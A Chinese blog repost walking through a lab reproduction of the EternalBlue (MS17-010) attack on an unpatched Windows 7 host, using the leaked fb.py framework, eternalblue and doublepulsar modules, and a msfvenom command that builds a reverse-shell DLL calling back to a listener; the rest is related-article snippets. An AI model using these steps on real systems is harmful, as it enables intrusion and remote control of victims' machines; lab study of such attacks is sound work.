永恒之蓝漏洞利用复现

最新推荐文章于 2023-06-05 20:09:36 发布
最新推荐文章于 2023-06-05 20:09:36 发布
阅读量169 收藏
点赞数
文章标签: shell 操作系统 python
原文链接:http://www.cnblogs.com/zhang293/p/7346859.html
版权

一、环境搭建:

IP地址系统信息备注角色
192.168.0.244win7旗舰版(未安装MS17-010补丁版本)需开启445端口及SMB协议靶机
192.168.0.105win7旗舰版需安装python2.6.6&pywin32攻击机
192.168.0.245kali linux 2.0生成reverse shell的dll文件辅助机

二、攻击流程:

  攻击流程图解:

  

 

  1.在kali linux中利用metasploit生成用于建立反向链接的dll文件

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > reverse.dll

  2.打开metasploit

  

  3.建立监听

  

  4.在Windows 7下,运行fb.py工具

  

  5.指定攻击目标

  

  6.指定攻击目标后,输入:use eternalblue,使用永恒之蓝漏洞

  7.一路确认输入的信息,知道选择攻击工具,选择fb模块

  

  8.再次确认攻击目标,之后输入:use doublepulsar

  9.选择要攻击的服务

  

  10.一路按确定键,直到进入选择执行动作这一步骤

  

  11.在选择攻击动作之前将步骤1中生成的reverse.dll文件放置在攻击机的c盘下

  12.选择2,将步骤1中生成的reverse.dll文件注入到靶机

  13.成功注入

  

  此时,攻击机获得靶机根权限,可以在攻击机上执行靶机的shell 命令,查看靶机文件。

 

转载于:https://www.cnblogs.com/zhang293/p/7346859.html

weixin_30443895
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用永恒之蓝入侵服务器复制文件,[原创]WannaCry勒索软件中“永恒之蓝漏洞利用分析...
weixin_42378997的博客
08-08 499
WannaCry勒索软件中,利用了NSA泄露工具中的“永恒之蓝”漏洞,关于这个漏洞,之前已经有一些分析,在我看的文章中,http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/说得最详细,该文章中针对win7 32位的系统的漏洞触发过程进行了分析。但是在整个网络上,我没有看到关于64位系统的分析,因此我在该文章的基础上,对win7 64...
利用kali,win7实现同网段永恒之蓝漏洞复现
最新发布
Y525698136的博客
03-02 1239
利用kali,win7实现同网段永恒之蓝漏洞复现
【网络安全】MS17-010“永恒之蓝”漏洞的利用
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
linux-ha heartbeat高可用的安装配置(http服务高可用)
www_xue_xi的博客
09-04 1696
linux-ha heartbeat高可用的安装配置(http服务高可用)
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
渗透基础笔记+作业(永恒之蓝复现
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
标题中的“逃逸IE浏览器沙箱-在野0Day漏洞利用复现”指的是针对Internet Explorer(IE)浏览器的安全研究,特别是关于如何利用未公开(0Day)漏洞来突破浏览器的安全沙箱机制。沙箱是一种安全措施,它限制了恶意代码...
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
记一次阿里云k8s部署-测试存储
sicc的博客
06-11 1242
记一次阿里云k8s部署 阿里云资源准备 服务器 ip 角色 资源 192.168.1.160 master1 2核4G 192.168.1.161 master2 2核4G 192.168.1.162 master3 2核4G 192.168.1.159 node2 2核4G 192.168.1.158 node1 2核4G 192.168.1.158 haproxy 192.168.1.159 nfs 47.97.195.116 弹性公网IP 绑定192.1
计算机网络大题
热门推荐
Echo的博客
09-11 3万+
如图所示网络。A在t=0时刻开始向C发送一个2Mbits的文件;B在t=0.1+e秒(e为无限趋近于0的小正实数)向D发送一个1Mbits的文件。忽略传播延迟和结点处理延迟。 请回答下列问题: 如果图中网络采用存储-转发方式的报文交换,则A将2Mbits的文件交付给C需要多长时间?B将1Mbits的文件交付给D需要多长时间? 如果图中网络采用存储-转发方式的分组交换,分组长度为等长的1kbits,且忽略分组头开销以及报文的拆装开销,则A将2Mbits的文件交付给C需要大约多长时间?B将1Mbits的
永恒之蓝漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝(EternalBlue)MS17-010
aopingying8163的博客
06-25 471
附加知识: 漏洞来源与背景: 这个漏洞最初是由NSA(美国国家安全局)发现的,但是他们发现漏洞他不讲,然后遭殃了吧。 后来 有一个黑客组织叫:Shadow Brokers (影子经纪人) 入侵了NSA下属的黑客组织,窃取了大量的工具。 并且将部分的黑客工具公开到互联网上拍卖,当时预期公开的价格是100W比特币(价值近5亿美元),但一直都没人买。 要知道黑客都是有脾气的, 一气...
利用NSA方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)
weixin_38948797的博客
01-27 1万+
利用方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)  (注:本文章仅供技术交流和学习,请勿用于非法用途)     相信17年最大的安全事件比特币勒索病毒Wanncary没几个人不知道吧。那么究竟比特币勒索病毒究竟是怎么一回事呢?所谓比特币勒索病毒即:永恒之蓝漏洞利用程序+Wannacry勒索软件程序,也正是这两个武器造就了迄今为止最巨大的网络攻击勒索事件,影响到近百个国家上千家企业及
入侵Windows服务器的流程
黑白程序的博客
10-26 6668
一般情况下,黑客往往喜欢通过文章的上所示的流程图对Windows服务器进行攻击,从而提高入侵服务器的效率。 ·通过端口139进入共享磁盘。139端口是为“NetBIOS Session Service”提供的,主要用于提供Windows文件和打印机共享。开启139端口虽然可以提供共享服务,但常常被攻击者所利用进行攻击,如使用流光、SuperScan等端口扫描工具可以扫描目标计算机的139端口,如
永恒之蓝(勒索病毒)复现与利用
qq_38348692的博客
08-08 3240
整个的复现的过程需要的环境以及工具有: kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174 winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141 win2007 :靶机,确保445端口开启。ip:192.168.15.144 永恒之蓝 python2.6已经在winsever下装python需...
永恒之蓝漏洞复现流程
09-01
永恒之蓝漏洞的复现流程大致如下: 1. 首先,你需要准备两台机器,一台是攻击机(Linux kali),另一台是靶机(Windows 2008R2)。 2. 打开Metasploit框架,可以使用命令`msfconsole`。 3. 在Metasploit框架中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值